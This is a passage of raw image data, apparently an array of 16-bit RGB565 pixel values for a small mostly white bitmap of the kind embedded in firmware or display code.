0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xefdf, 0xf7ff, 0xefff, 0xefff, 0xe7ff, 0xdfff, 0xcfbf, 0xc7bf, 0xcfbf, 0xd7ff, 0xdfff, 0xe7ff, 0xe7ff, 0xe7ff, 0xefff, 0xf7ff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xf7ff, 0xffff, 0xfffe, 0xffde, 0xffdd, 0xffdd, 0xfffd, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffde, 0xfffe, 0xfffe, 0xffde, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffbe, 0xffff, 0xffff, 0xef9e, 0xc65b, 0xc69d, 0xbe9d, 0xae7e, 0xae9e, 0xb6be, 0xae9d, 0xae9d, 0xaede, 0xae9e, 0xae7e, 0xae7e, 0xae9e, 0xa69d, 0xaebe, 0xbefe, 0xc73e, 0xe7ff, 0xe7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xefbf, 0x5b71, 0x5b91, 0x5b90, 0x538f, 0x4b8f, 0x4bd0, 0x436f, 0x53b1, 0x538f, 0x5390, 0x53b1, 0x4390, 0x43b1, 0x43b0, 0x4370, 0x53d2, 0x53b2, 0x6455, 0x9dfb, 0xcf7f, 0xf7ff, 0xf7ff, 0xffbe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffdc, 0xffbc, 0xffdd, 0xffbe, 0xffdd, 0xfffe, 0xffff, 0xfffe, 0xfffe, 0xfffd, 0xfffe, 0xffff, 0xffde, 0xfffe, 0xffdd, 0xfffe, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffbe, 0xffde, 0xffff, 0xffde, 0xffde, 0xfffe, 0xffdd, 0xfffe, 0xffde, 0xffde, 0xffbe, 0xffdd, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xefff, 0xf7ff, 0xf7ff, 0xefff, 0xefff, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xf7df, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xefff, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffdd, 0xffdf, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xfffd, 0xfffd, 0xffde, 0xffff, 0xfffe, 0xfffe, 0xfffd, 0xffbd, 0xfffe, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xffdf, 0xffbe, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffbf, 0xffff, 0xefdf, 0xf7ff, 0xf7ff, 0xffff, 0xf7bf, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xf7de, 0xffdf, 0xffff, 0xffdf, 0xf7fe, 0xffff, 0xf7fe, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xf7df, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xffff, 0xfffe, 0xffdc, 0xfffe, 0xe7df, 0xe79f, 0xfffe, 0xffdc, 0xfffd, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffde, 0xffbd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffde, 0xfffe, 0xffff, 0xf7ff, 0xffff, 0xfffd, 0xffdc, 0xffdf, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7df, 0xffff, 0xd678, 0xffbd, 0xffde, 0xef1c, 0xffff, 0xdf3d, 0xf7ff, 0xcefa, 0xf7ff, 0xdf7e, 0xe77f, 0xe7bf, 0xdf3c, 0xf79d, 0xffff, 0xce9b, 0xef9f, 0xf7ff, 0xd69c, 0xf75f, 0xffbf, 0xffdf, 0xffff, 0xffdf, 0xff9e, 0xdeda, 0xe73c, 0xdf1c, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdd, 0xffff, 0xffdf, 0xf7df, 0xf7ff, 0xf7ff, 0xffde, 0xffff, 0xffff, 0xffff, 0xf7df, 0xffff, 0xf7ff, 0xf7df, 0xf7df, 0xffbf, 0xffbf, 0xffff, 0xf7be, 0xf7fe, 0xffff, 0xf7ff, 0xf7df, 0xf7df, 0xf7ff, 0xf7df, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffdd, 0xffbb, 0xf7fe, 0x961b, 0x6495, 0xffff, 0xfffc, 0xffdd, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xfffe, 0xffdd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffde, 0xffdd, 0xffde, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xc639, 0xa514, 0xb595, 0xdeda, 0x8c30, 0x9cf3, 0xc639, 0xffff, 0xa535, 0xb5b6, 0xad55, 0xad54, 0x8c71, 0xbdf8, 0xdf1c, 0xc67b, 0x7c32, 0xadd9, 0xbe19, 0x8431, 0xb596, 0xbdf8, 0xef7e, 0x8c51, 0xb575, 0x9cb2, 0xb576, 0x9cf4, 0x94b3, 0xe71c, 0xffff, 0xf7bf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffbe, 0xffff, 0xbe18, 0xb5f7, 0xe6fb, 0xf75c, 0xbe38, 0xbe17, 0xffff, 0xffdd, 0xad32, 0xff9d, 0xffbd, 0xb596, 0xe6fc, 0xb596, 0xffff, 0xfffe, 0xfffe, 0xdefa, 0xad74, 0xffff, 0xf7df, 0xffdf, 0xf7be, 0xad75, 0xbdd7, 0xbdb6, 0xb595, 0xcdf7, 0xd678, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7df, 0xffde, 0xffbb, 0xf7ff, 0x7e3d, 0x5519, 0xe7ff, 0xfffd, 0xfffe, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xad56, 0xb597, 0xad76, 0xa576, 0x8cb2, 0xef9d, 0x94d2, 0xe71c, 0xd659, 0xe69a, 0xd616, 0xbd53, 0xcdd5, 0xad33, 0xffff, 0x9d35, 0xc659, 0xad54, 0x9490, 0xce57, 0x9d12, 0xce58, 0xffff, 0xbdf7, 0xf7df, 0xa535, 0xb5b7, 0x9d14, 0x9cb3, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffde, 0xe71b, 0x9471, 0x9cf3, 0xc617, 0xad33, 0xce79, 0xad75, 0xdefa, 0xb574, 0xa4f2, 0xb573, 0xa553, 0x842e, 0xadb5, 0xce98, 0xfffe, 0xf7bd, 0xef5c, 0xd699, 0xad54, 0xef5c, 0xffff, 0xffff, 0xbdf8, 0x9cf4, 0xce7a, 0xdefc, 0xe71c, 0xa513, 0xe71b, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xf7df, 0xffbd, 0xffbb, 0xefff, 0x7e5e, 0x4d18, 0xdfff, 0xfffe, 0xfffe, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xd67b, 0xb578, 0xb578, 0xc65a, 0xbe59, 0xb616, 0xd71a, 0xfffe, 0xbdb5, 0xd679, 0xc5d6, 0xa4f3, 0xde98, 0x9c91, 0xef5d, 0xce79, 0xad54, 0xd678, 0xce57, 0xc637, 0xad74, 0xc678, 0xef7d, 0x6bae, 0x9d34, 0x9514, 0xadb7, 0x9d14, 0x9472, 0xe71c, 0xffff, 0xffde, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7de, 0xffff, 0xdeba, 0x6b2c, 0xc618, 0xad75, 0xc5f7, 0x9492, 0xdebb, 0xe73d, 0xb5d7, 0xb5f7, 0xceb9, 0x9d73, 0xc6b8, 0x8491, 0xf7ff, 0xdf1c, 0x8431, 0xe73d, 0x9cf4, 0xb5b6, 0xbdf7, 0xffdf, 0xbdf8, 0xce7a, 0x9cf4, 0xbe18, 0x9d14, 0xbe38, 0xffff, 0xffdf, 0xf7be, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffde, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xefff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xefff, 0xffff, 0xfffe, 0xe7ff, 0x8e9d, 0x5d17, 0xefff, 0xfffe, 0xfffe, 0xf7ff, 0xf7ff, 0xffdf, 0xffbf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xbdd8, 0xbd98, 0xb537, 0xce19, 0xa534, 0xa573, 0xa5b4, 0xf7fe, 0xc658, 0xd6db, 0xbe3a, 0x9d36, 0xa575, 0x9cf3, 0xf79d, 0xffff, 0x8c50, 0xc638, 0xbdf7, 0xc639, 0x8c92, 0xffff, 0xffff, 0xceba, 0xffff, 0xd6fb, 0xb5d6, 0xa554, 0xd69a, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xf79d, 0x9451, 0xd679, 0xa514, 0xa575, 0xc5f7, 0xd679, 0xffff, 0xbe18, 0x9d35, 0xad96, 0xbdf7, 0xd6ba, 0xe73c, 0xc658, 0xffff, 0x94b3, 0xdefc, 0xd6db, 0xa555, 0xffff, 0x73ae, 0xffff, 0xce38, 0xc5f7, 0xffff, 0x8410, 0x73ae, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 